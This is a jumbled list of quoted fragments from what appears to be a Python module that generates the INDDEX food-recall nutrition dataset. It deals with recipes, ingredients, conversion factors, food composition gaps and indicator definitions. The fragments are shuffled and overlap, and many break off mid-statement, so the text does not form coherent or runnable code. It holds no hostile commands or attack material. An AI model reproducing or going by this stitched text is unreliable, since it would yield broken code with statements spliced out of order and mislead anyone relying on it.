"+ ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe =",
"rows aren't part of a recipe, or it wasn't found\"\"\" for raw_row in",
"try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None",
"food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may report eating",
"in the UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug]",
"IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code',",
"request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] #",
"= group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from",
"= bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct)",
"get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01)",
"import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, )",
"references point to the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients",
"amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return",
"has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX",
"def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them from",
"self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if",
"ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False",
"def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return",
"raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside the",
"IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR,",
"self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name']",
"not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows",
"IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR),",
"True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values,",
"IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block',",
"I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META),",
"explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow",
"= 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code'",
"self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used",
"I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR,",
"rows inserted for each ingredient. These rows are associated with the recipe case,",
"in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code",
"'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code",
"if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will",
"\"\"\" This file contains the logic to generate the master dataset for the",
"import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER =",
"that's a child of this foodrecall. This dataset has a row for every",
"in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped",
"self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) <",
"is or isn't available. Some of these foods are recipes, and their ingredients",
"(user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If",
"ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code =",
"self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k,",
"if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif",
"v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request):",
"for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE",
"self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount =",
"res else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try:",
"I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code',",
"Components ---------- FoodData :: This is the interface to this dataset, it glues",
"all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code =",
"case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None",
"recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for",
"class I: def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr",
"row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid]",
"AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR =",
"of a \"food\" case that's a child of this foodrecall. This dataset has",
"calculated nutritional information, and auditing columns reporting on what data is or isn't",
"additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may report",
"set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if",
"[v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k",
":: Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator import",
"in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags #",
"food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups",
"tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later =",
"IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time',",
"IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META),",
"if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients)",
"= group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients)",
"is the interface to this dataset, it glues together all the component pieces",
"self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name",
"__init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if slug not in",
"filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is",
"insert duplicates of the previously reported ingredients into the report for them. Components",
"from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data",
"IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR,",
"to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and",
"definitions. \"\"\" import operator import uuid from collections import defaultdict from functools import",
"'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row",
"not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and",
"age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def",
"import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from",
"self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used =",
"recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: #",
"dataset, it glues together all the component pieces and presents the result as",
"from the food fixture or from the parent food case's UCR if indicator.in_food_fixture:",
"getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an",
"I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code',",
"return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if",
"by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs)",
"nonstandard recipe more than once, in which case subsequent references point to the",
"I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'),",
"IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR),",
"row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id =",
"fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code",
"total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values",
"IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections:",
"_insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them from the",
"I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR),",
"ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: #",
"show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type",
"portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None",
"and beneficiary during a recall session. The ingredients of the recipe are entered",
"that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3',",
"self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if",
"I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2',",
"nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe,",
"the creation of a \"food\" case that's a child of this foodrecall. This",
"== STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for",
"= _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None",
"( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR",
"if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if",
"= 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the",
"self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount",
"with metadata about the recall session, calculated nutritional information, and auditing columns reporting",
"name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete:",
"ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not",
"yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type ==",
"a unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions.",
"return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): #",
"self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name:",
"generate the master dataset for the INDDEX reports Overview -------- Beneficiaries are asked",
"the \"recipes\" lookup table. This dataset has additional rows inserted for each ingredient.",
"self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and",
"not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug]",
"operator import uuid from collections import defaultdict from functools import reduce from memoized",
"self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE):",
"= len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if",
"here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id',",
"I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug:",
"[] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids())",
"(STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction",
"or EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES()",
"class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring for",
"= FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE,",
"get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG:",
"else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams =",
"request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod",
"[recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if",
"== STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient cases",
"it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams =",
"self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type",
"domain, *, datespan, filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS:",
"FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for",
"row-wise calculations and indicator definitions. \"\"\" import operator import uuid from collections import",
"in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val",
"NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else:",
"they mention results in the creation of a \"food\" case that's a child",
"definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert",
"IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR,",
"False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows",
"= _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None",
"for row-wise calculations and indicator definitions. \"\"\" import operator import uuid from collections",
"import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as",
"'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k",
"\"recall\" session. This results in a \"foodrecall\" case. Every food they mention results",
"FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code':",
"IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR,",
"def _matches_in_memory_filters(self, row): # If a gap type is specified, show only rows",
"def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound",
"I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in",
"the recipe are entered as additional food cases and linked to the recipe",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR),",
"STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col",
"food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return",
"ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient ==",
"to the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We",
"ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc",
"NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code =",
".show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a",
"in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code =",
"filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls(",
"@property def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if",
"'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None):",
"self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\") class",
"else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in",
"columns reporting on what data is or isn't available. Some of these foods",
"row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes':",
"self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code:",
"= self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6',",
"slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr =",
"col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are",
"NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is",
"some values, insert them from the master recipe nsr_cols = {col: master_recipe[col] for",
"request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in",
"_multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val)",
"if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code",
"ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res",
"recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return",
"portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val",
"indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator",
"IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams',",
"IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META),",
"'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group",
"from functools import reduce from memoized import memoized from corehq.apps.es import users as",
"from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from",
"beneficiary during a recall session. The ingredients of the recipe are entered as",
"if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def",
"get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified,",
"recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] =",
"these foods are recipes, and their ingredients appear as separate rows in the",
"FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META",
"= [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name",
"the UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if",
"elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return",
"IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR,",
"IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR,",
"for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request):",
"don't have a case of their own. Nonstandard recipes are defined by the",
"IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name',",
"case that's a child of this foodrecall. This dataset has a row for",
"by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than once, in",
"v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain,",
"to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more",
"self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row",
